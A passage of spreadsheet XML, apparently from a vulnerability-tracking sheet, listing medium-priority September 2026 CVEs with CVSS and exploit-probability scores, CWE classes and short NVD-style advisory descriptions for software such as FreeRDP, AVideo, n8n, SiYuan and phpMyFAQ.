      <c r="A3283" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3283" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85089</t>
        </is>
      </c>
      <c r="C3283" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3283" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3283" s="5" t="inlineStr"/>
      <c r="F3283" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G3283" s="5" t="inlineStr"/>
      <c r="H3283" s="5" t="inlineStr">
        <is>
          <t>freerdp:freerdp</t>
        </is>
      </c>
      <c r="I3283" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J3283" s="5" t="inlineStr"/>
      <c r="K3283" s="5" t="inlineStr">
        <is>
          <t>CWE-908</t>
        </is>
      </c>
      <c r="L3283" s="5" t="inlineStr">
        <is>
          <t>FreeRDP versions 3.0.0 through 3.30.0 (before 3.31.0) transmit uninitialized heap memory in Save Session Info PDU reserved padding fields. Three PDU writers in libfreerdp/core/info.c (rdp_write_logon_info_v2, rdp_write_logon_info_plain, and rdp_write_logon_info_ex) use Stream_Seek instead of Stream_Zero for reserved pad bytes (up to 576 bytes), leaving previously freed heap contents in the outgoing PDU. Because the send buffer is allocated with malloc (not zeroed), stale heap data — which may include cleartext credentials from prior sessions — can be sent to the receiving peer. FreeRDP-based servers using rdpUpdate::SaveSessionInfo and freerdp-proxy (which forwards these PDUs) are affected, allowing disclosure of server/proxy process memory to a downstream client.</t>
        </is>
      </c>
      <c r="M3283" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85089</t>
        </is>
      </c>
    </row>
    <row r="3284">
      <c r="A3284" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3284" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85093</t>
        </is>
      </c>
      <c r="C3284" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3284" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3284" s="5" t="inlineStr"/>
      <c r="F3284" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3284" s="5" t="inlineStr"/>
      <c r="H3284" s="5" t="inlineStr"/>
      <c r="I3284" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J3284" s="5" t="inlineStr"/>
      <c r="K3284" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L3284" s="5" t="inlineStr">
        <is>
          <t>Cheshire Cat AI's GET /memory/collections/{collection_id}/points endpoint fails to apply per-user filtering when retrieving episodic memory points. Authenticated attackers with MEMORY:READ permission can retrieve all users' stored conversation messages and personal data by paginating through the collection using the offset cursor.</t>
        </is>
      </c>
      <c r="M3284" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85093</t>
        </is>
      </c>
    </row>
    <row r="3285">
      <c r="A3285" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3285" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85162</t>
        </is>
      </c>
      <c r="C3285" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3285" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3285" s="5" t="inlineStr"/>
      <c r="F3285" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G3285" s="5" t="inlineStr"/>
      <c r="H3285" s="5" t="inlineStr"/>
      <c r="I3285" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J3285" s="5" t="inlineStr"/>
      <c r="K3285" s="5" t="inlineStr">
        <is>
          <t>CWE-352</t>
        </is>
      </c>
      <c r="L3285" s="5" t="inlineStr">
        <is>
          <t>AVideo through commit c91b5975d contains a cross-site request forgery vulnerability in plugin/Live/saveLive.php that lacks forbidIfNotPost and forbidIfInvalidToken protections. Attackers can craft malicious image tags to overwrite authenticated streamers' RTMP keys, passwords, and titles, hijacking live broadcasts.</t>
        </is>
      </c>
      <c r="M3285" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85162</t>
        </is>
      </c>
    </row>
    <row r="3286">
      <c r="A3286" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3286" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85163</t>
        </is>
      </c>
      <c r="C3286" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3286" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3286" s="5" t="inlineStr"/>
      <c r="F3286" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3286" s="5" t="inlineStr"/>
      <c r="H3286" s="5" t="inlineStr"/>
      <c r="I3286" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J3286" s="5" t="inlineStr"/>
      <c r="K3286" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L3286" s="5" t="inlineStr">
        <is>
          <t>AVideo through commit c91b5975d contains a server-side request forgery vulnerability in the EPG parser that allows authenticated uploaders to fetch arbitrary internal URLs. An attacker can supply an internal URL via the epg_link parameter during video upload, which is validated only for syntax and later fetched server-side during EPG generation without SSRF protection checks.</t>
        </is>
      </c>
      <c r="M3286" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85163</t>
        </is>
      </c>
    </row>
    <row r="3287">
      <c r="A3287" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3287" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85164</t>
        </is>
      </c>
      <c r="C3287" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3287" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3287" s="5" t="inlineStr"/>
      <c r="F3287" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3287" s="5" t="inlineStr"/>
      <c r="H3287" s="5" t="inlineStr"/>
      <c r="I3287" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J3287" s="5" t="inlineStr"/>
      <c r="K3287" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L3287" s="5" t="inlineStr">
        <is>
          <t>WWBN AVideo through commit c91b5975d contains a server-side request forgery vulnerability in the set_api_userImages API endpoint that fails to validate profileImg and backgroundImg URLs before fetching them. Authenticated API clients can supply internal URLs to fetch cloud metadata or internal services, with responses written to publicly accessible web paths for retrieval.</t>
        </is>
      </c>
      <c r="M3287" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85164</t>
        </is>
      </c>
    </row>
    <row r="3288">
      <c r="A3288" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3288" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85170</t>
        </is>
      </c>
      <c r="C3288" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3288" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3288" s="5" t="inlineStr"/>
      <c r="F3288" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3288" s="5" t="inlineStr"/>
      <c r="H3288" s="5" t="inlineStr"/>
      <c r="I3288" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J3288" s="5" t="inlineStr"/>
      <c r="K3288" s="5" t="inlineStr">
        <is>
          <t>CWE-20</t>
        </is>
      </c>
      <c r="L3288" s="5" t="inlineStr">
        <is>
          <t>n8n versions before 1.123.73, 2.35.4, and 2.36.2 pass message content in the Gmail (v1) and Brevo nodes to the mail composer without verifying it is a string. An authenticated user able to run a workflow can supply an expression that resolves to an object carrying a path or href property, causing the composer to read a local file accessible to the n8n process or fetch an internal URL (SSRF) and attach the result to the outgoing message.</t>
        </is>
      </c>
      <c r="M3288" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85170</t>
        </is>
      </c>
    </row>
    <row r="3289">
      <c r="A3289" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3289" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85171</t>
        </is>
      </c>
      <c r="C3289" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3289" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3289" s="5" t="inlineStr"/>
      <c r="F3289" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G3289" s="5" t="inlineStr"/>
      <c r="H3289" s="5" t="inlineStr"/>
      <c r="I3289" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J3289" s="5" t="inlineStr"/>
      <c r="K3289" s="5" t="inlineStr">
        <is>
          <t>CWE-532</t>
        </is>
      </c>
      <c r="L3289" s="5" t="inlineStr">
        <is>
          <t>n8n before 1.123.73, 2.35.4, and 2.36.2 contains a credential exposure vulnerability in the Strapi, SeaTable, and Mailcheck nodes. These nodes send their decrypted credentials to the authentication endpoint via the raw legacy HTTP helper outside any error handling, causing the plaintext secret to be persisted in execution error data. Any authenticated user can read the plaintext secret from their own execution through the REST API, bypassing the blank-value redaction enforced by the credentials API.</t>
        </is>
      </c>
      <c r="M3289" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85171</t>
        </is>
      </c>
    </row>
    <row r="3290">
      <c r="A3290" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3290" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85389</t>
        </is>
      </c>
      <c r="C3290" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3290" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3290" s="5" t="inlineStr"/>
      <c r="F3290" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3290" s="5" t="inlineStr"/>
      <c r="H3290" s="5" t="inlineStr"/>
      <c r="I3290" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J3290" s="5" t="inlineStr"/>
      <c r="K3290" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="L3290" s="5" t="inlineStr">
        <is>
          <t>Worklenz before 3.0.0 fails to verify task ownership by organization when resolving task-scoped API endpoints, allowing authenticated users to access another tenant's task data. Attackers can query task endpoints with arbitrary task UUIDs to retrieve work logs, comments, attachments, and project insights belonging to other organizations.</t>
        </is>
      </c>
      <c r="M3290" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85389</t>
        </is>
      </c>
    </row>
    <row r="3291">
      <c r="A3291" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3291" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85390</t>
        </is>
      </c>
      <c r="C3291" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3291" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3291" s="5" t="inlineStr"/>
      <c r="F3291" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3291" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3291" s="5" t="inlineStr"/>
      <c r="I3291" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J3291" s="5" t="inlineStr"/>
      <c r="K3291" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L3291" s="5" t="inlineStr">
        <is>
          <t>Checkmate through 3.11.0 omits the isAllowed role guard middleware on maintenance-window, notification, and check-deletion routes, allowing read-only users to perform administrative actions. Attackers with user-role sessions can create arbitrary maintenance windows to silence alerts, modify notification channels, and delete monitor check history to erase incident evidence.</t>
        </is>
      </c>
      <c r="M3291" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85390</t>
        </is>
      </c>
    </row>
    <row r="3292">
      <c r="A3292" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3292" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85451</t>
        </is>
      </c>
      <c r="C3292" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3292" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3292" s="5" t="inlineStr"/>
      <c r="F3292" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3292" s="5" t="inlineStr"/>
      <c r="H3292" s="5" t="inlineStr"/>
      <c r="I3292" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J3292" s="5" t="inlineStr"/>
      <c r="K3292" s="5" t="inlineStr">
        <is>
          <t>CWE-798</t>
        </is>
      </c>
      <c r="L3292" s="5" t="inlineStr">
        <is>
          <t>MOOS core-moos through 10.4.0 contains a remote process termination vulnerability in the SuicidalSleeper component that uses a hard-coded passphrase for multicast command authorization. Any multicast-reachable peer can enumerate MOOS processes and send termination commands to trigger process shutdown by exploiting the default multicast group and port with the known passphrase.</t>
        </is>
      </c>
      <c r="M3292" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85451</t>
        </is>
      </c>
    </row>
    <row r="3293">
      <c r="A3293" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3293" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85545</t>
        </is>
      </c>
      <c r="C3293" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3293" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3293" s="5" t="inlineStr"/>
      <c r="F3293" s="5" t="inlineStr"/>
      <c r="G3293" s="5" t="inlineStr"/>
      <c r="H3293" s="5" t="inlineStr"/>
      <c r="I3293" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J3293" s="5" t="inlineStr"/>
      <c r="K3293" s="5" t="inlineStr">
        <is>
          <t>CWE-284</t>
        </is>
      </c>
      <c r="L3293" s="5" t="inlineStr">
        <is>
          <t>There is an Vulnerability in some HikCentral Access Control versions. Authenticated low-privilege users can invoke API interfaces that their role is not authorized to access.</t>
        </is>
      </c>
      <c r="M3293" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85545</t>
        </is>
      </c>
    </row>
    <row r="3294">
      <c r="A3294" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3294" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85578</t>
        </is>
      </c>
      <c r="C3294" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3294" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3294" s="5" t="inlineStr"/>
      <c r="F3294" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3294" s="5" t="inlineStr"/>
      <c r="H3294" s="5" t="inlineStr"/>
      <c r="I3294" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J3294" s="5" t="inlineStr"/>
      <c r="K3294" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L3294" s="5" t="inlineStr">
        <is>
          <t>SiYuan through 3.8.1 contains an authorization bypass vulnerability in the /api/file/getFile endpoint that allows readers to retrieve files from notebooks explicitly configured as Visible:false. Attackers with reader role can access private workspace files including notebook metadata and internal configuration by knowing the hidden notebook identifier and file path.</t>
        </is>
      </c>
      <c r="M3294" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85578</t>
        </is>
      </c>
    </row>
    <row r="3295">
      <c r="A3295" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3295" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85580</t>
        </is>
      </c>
      <c r="C3295" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3295" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3295" s="5" t="inlineStr"/>
      <c r="F3295" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G3295" s="5" t="inlineStr"/>
      <c r="H3295" s="5" t="inlineStr"/>
      <c r="I3295" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J3295" s="5" t="inlineStr"/>
      <c r="K3295" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L3295" s="5" t="inlineStr">
        <is>
          <t>SiYuan versions before v3.8.2 contain a path guard bypass vulnerability in the MCP file-access handler that uses case-sensitive matching on Linux filesystems. Attackers can read the protected publishAccess.json file by requesting case-variant paths like PublishAccess.json to disclose sensitive publish-access configuration and metadata.</t>
        </is>
      </c>
      <c r="M3295" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85580</t>
        </is>
      </c>
    </row>
    <row r="3296">
      <c r="A3296" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3296" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85582</t>
        </is>
      </c>
      <c r="C3296" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3296" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3296" s="5" t="inlineStr"/>
      <c r="F3296" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G3296" s="5" t="inlineStr"/>
      <c r="H3296" s="5" t="inlineStr"/>
      <c r="I3296" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J3296" s="5" t="inlineStr"/>
      <c r="K3296" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="L3296" s="5" t="inlineStr">
        <is>
          <t>SiYuan versions before v3.8.2 contain an unbounded session creation vulnerability in the publish-service Basic Auth handler that allows authenticated attackers to exhaust memory. Attackers can repeatedly authenticate with valid credentials to create persistent session entries without expiry or capacity limits, causing indefinite process memory growth and denial of service.</t>
        </is>
      </c>
      <c r="M3296" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85582</t>
        </is>
      </c>
    </row>
    <row r="3297">
      <c r="A3297" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3297" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85583</t>
        </is>
      </c>
      <c r="C3297" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3297" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3297" s="5" t="inlineStr"/>
      <c r="F3297" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G3297" s="5" t="inlineStr"/>
      <c r="H3297" s="5" t="inlineStr"/>
      <c r="I3297" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J3297" s="5" t="inlineStr"/>
      <c r="K3297" s="5" t="inlineStr">
        <is>
          <t>CWE-59</t>
        </is>
      </c>
      <c r="L3297" s="5" t="inlineStr">
        <is>
          <t>SiYuan versions before v3.8.2 contain a path traversal vulnerability in the reader-accessible file-read endpoint that follows symlinks when opening authorized asset paths. Attackers with reader role can request a logical asset under data/assets/ that is a symlink to a file outside the workspace and receive the target file bytes, bypassing workspace boundary restrictions.</t>
        </is>
      </c>
      <c r="M3297" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85583</t>
        </is>
      </c>
    </row>
    <row r="3298">
      <c r="A3298" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3298" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85590</t>
        </is>
      </c>
      <c r="C3298" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3298" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3298" s="5" t="inlineStr"/>
      <c r="F3298" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G3298" s="5" t="inlineStr"/>
      <c r="H3298" s="5" t="inlineStr"/>
      <c r="I3298" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J3298" s="5" t="inlineStr"/>
      <c r="K3298" s="5" t="inlineStr">
        <is>
          <t>CWE-308</t>
        </is>
      </c>
      <c r="L3298" s="5" t="inlineStr">
        <is>
          <t>phpMyFAQ before 4.1.8 contains an authentication bypass vulnerability in its two-factor authentication (TOTP) disable functionality. The removeTwofactorConfig() handler (reachable via POST /api/user/remove-twofactor) verifies only that the user is logged in and that a valid CSRF token is supplied, then disables TOTP without requiring password re-entry or a current TOTP code. The same downgrade is also reachable inline via PUT /api/user/data/update, which accepts a plain twofactor_enabled form field under the same session+CSRF-only guard. An attacker who has hijacked a user's session can silently strip two-factor protection from any account, including administrator accounts, after which password-only authentication succeeds.</t>
        </is>
      </c>
      <c r="M3298" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85590</t>
        </is>
      </c>
    </row>
    <row r="3299">
      <c r="A3299" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3299" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85591</t>
        </is>
      </c>
      <c r="C3299" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3299" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3299" s="5" t="inlineStr"/>
      <c r="F3299" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3299" s="5" t="inlineStr"/>
      <c r="H3299" s="5" t="inlineStr"/>
      <c r="I3299" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J3299" s="5" t="inlineStr"/>
      <c r="K3299" s="5" t="inlineStr">
        <is>
          <t>CWE-620</t>
        </is>
      </c>
      <c r="L3299" s="5" t="inlineStr">
        <is>
          <t>phpMyFAQ versions before 4.1.8 contain an authentication bypass vulnerability in the user control panel API endpoint that allows authenticated attackers to change account passwords without verifying the current password. Attackers with session access can submit a PUT request to the user data update endpoint with only a CSRF token to silently change any user's password, including administrators, causing irreversible account takeover and victim lockout.</t>
        </is>
      </c>
      <c r="M3299" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85591</t>
        </is>
      </c>
    </row>
    <row r="3300">
      <c r="A3300" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3300" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85603</t>
        </is>
      </c>
      <c r="C3300" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3300" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3300" s="5" t="inlineStr"/>
      <c r="F3300" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G3300" s="5" t="inlineStr"/>
      <c r="H3300" s="5" t="inlineStr"/>
      <c r="I3300" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J3300" s="5" t="inlineStr"/>
      <c r="K3300" s="5" t="inlineStr">
        <is>
          <t>CWE-73</t>
        </is>
      </c>
      <c r="L3300" s="5" t="inlineStr">
        <is>
          <t>Grav versions before 1.10.55 contain a path traversal vulnerability in the admin plugin's Save As action that fails to validate the language code parameter. An authenticated admin user with admin.pages.create permission can supply directory traversal sequences in the lang POST field to write arbitrary .md files outside the pages directory with attacker-controlled content.</t>
        </is>
      </c>
      <c r="M3300" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85603</t>
        </is>
      </c>
    </row>
    <row r="3301">
      <c r="A3301" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3301" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85618</t>
        </is>
      </c>
      <c r="C3301" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3301" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3301" s="5" t="inlineStr"/>
      <c r="F3301" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G3301" s="5" t="inlineStr"/>
      <c r="H3301" s="5" t="inlineStr"/>
      <c r="I3301" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J3301" s="5" t="inlineStr"/>
      <c r="K3301" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L3301" s="5" t="inlineStr">
        <is>
          <t>ConvertX 0.17.0 contains an arbitrary file read vulnerability in the xelatex converter that allows authenticated users to read files by uploading LaTeX files with input directives. Attackers can upload .tex files containing \\input{path} or \\verbatiminput{path} directives to have the TeX engine read arbitrary files accessible to the server process and include them in downloadable PDF output.</t>
        </is>
      </c>
      <c r="M3301" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85618</t>
        </is>
      </c>
    </row>
    <row r="3302">
      <c r="A3302" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3302" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85624</t>
        </is>
      </c>
      <c r="C3302" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3302" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3302" s="5" t="inlineStr"/>
      <c r="F3302" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G3302" s="5" t="inlineStr"/>
      <c r="H3302" s="5" t="inlineStr"/>
      <c r="I3302" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J3302" s="5" t="inlineStr"/>
      <c r="K3302" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="L3302" s="5" t="inlineStr">
        <is>
          <t>Blinko 1.8.7 contains a cross-user private note disclosure vulnerability in the noteReferenceList procedure that performs no ownership verification on supplied note identifiers. Authenticated attackers can enumerate sequential note IDs and retrieve complete content of other users' private notes including attachments and tags.</t>
        </is>
      </c>
      <c r="M3302" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85624</t>
        </is>
      </c>
    </row>
    <row r="3303">
      <c r="A3303" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3303" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85654</t>
        </is>
      </c>
      <c r="C3303" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3303" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3303" s="5" t="inlineStr"/>
      <c r="F3303" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G3303" s="5" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="H3303" s="5" t="inlineStr"/>
      <c r="I3303" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J3303" s="5" t="inlineStr"/>
      <c r="K3303" s="5" t="inlineStr">
        <is>
          <t>CWE-1336</t>
        </is>
      </c>
      <c r="L3303" s="5" t="inlineStr">
        <is>
          <t>Improper neutralization of special elements used in a template engine in the CDK generator in Amazon awslabs.dynamodb-mcp-server before 2.1.6 might allow a context-dependent actor to execute arbitrary code on the host that deploys the generated application via crafted table, index, or attribute names in a data model file.</t>
        </is>
      </c>
      <c r="M3303" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85654</t>
        </is>
      </c>
    </row>
    <row r="3304">
      <c r="A3304" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3304" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85669</t>
        </is>
      </c>
      <c r="C3304" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3304" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3304" s="5" t="inlineStr"/>
      <c r="F3304" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3304" s="5" t="inlineStr"/>
      <c r="H3304" s="5" t="inlineStr"/>
      <c r="I3304" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J3304" s="5" t="inlineStr"/>
      <c r="K3304" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L3304" s="5" t="inlineStr">
        <is>
